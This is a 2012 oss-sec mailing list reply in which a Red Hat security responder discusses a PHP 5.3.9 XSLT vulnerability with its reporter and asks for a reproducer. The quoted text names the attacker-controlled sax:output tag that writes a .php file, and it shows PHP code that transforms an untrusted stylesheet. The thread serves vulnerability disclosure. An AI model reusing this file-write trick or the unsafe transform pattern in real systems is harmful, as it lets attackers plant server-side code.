oss-sec mailing list archives
Re: CVE affected for PHP 5.3.9 ?
From: Kurt Seifried <kseifried () redhat com>
Date: Sat, 14 Jan 2012 19:44:07 -0700
On 01/14/2012 05:15 PM, Nicolas Grégoire wrote:
Right but the script has to have the line <sax:output href="0wn3d.php" method="text">Wrong. The PHP code only has to call transformToXML() after having loaded the malicious XSLT code via importStylesheet(). The XML data itself is irrelevant for this bug and the "sax:output" tag isn't in the PHP script but in the XSLT stylesheet provided by the attacker. # LOAD XML FILE $XML = new DOMDocument(); $XML->loadXML( $sXml ); # LOAD XSLT FILE $XSL = new DOMDocument(); $XSL->loadXML( $sXsl ); // Content of $xXsl may be untrusted ! # START XSLT $xslt = new XSLTProcessor(); $xslt->importStylesheet( $XSL ); # TRASNFORM & PRINT print $xslt->transformToXML( $XML ); // File creation ! Nicolas
So the attacker can control the output file name/location via a malformed input from the attacker only? This would have been good to have in your original info (we could have avoided this back and forth). Can you provide a reproducer (vuln script and a malicious input) that shows this in action (e.g. creates a local php file). -- -- Kurt Seifried / Red Hat Security Response Team
Current thread:
- CVE affected for PHP 5.3.9 ? Nicolas Grégoire (Jan 13)
- Re: CVE affected for PHP 5.3.9 ? Kurt Seifried (Jan 13)
- Re: CVE affected for PHP 5.3.9 ? Nicolas Grégoire (Jan 13)
- Re: CVE affected for PHP 5.3.9 ? Kurt Seifried (Jan 13)
- Re: CVE affected for PHP 5.3.9 ? Nicolas Grégoire (Jan 13)
- Re: CVE affected for PHP 5.3.9 ? Kurt Seifried (Jan 13)
- Re: CVE affected for PHP 5.3.9 ? Ignacio Espinosa (Jan 14)
- Re: CVE affected for PHP 5.3.9 ? Kurt Seifried (Jan 14)
- Re: CVE affected for PHP 5.3.9 ? Nicolas Grégoire (Jan 14)
- Re: CVE affected for PHP 5.3.9 ? Kurt Seifried (Jan 14)
- Re: CVE affected for PHP 5.3.9 ? Nicolas Grégoire (Jan 15)
- Re: CVE affected for PHP 5.3.9 ? Kurt Seifried (Jan 17)
- Re: CVE affected for PHP 5.3.9 ? Nicolas Grégoire (Jan 13)
- Re: CVE affected for PHP 5.3.9 ? Kurt Seifried (Jan 13)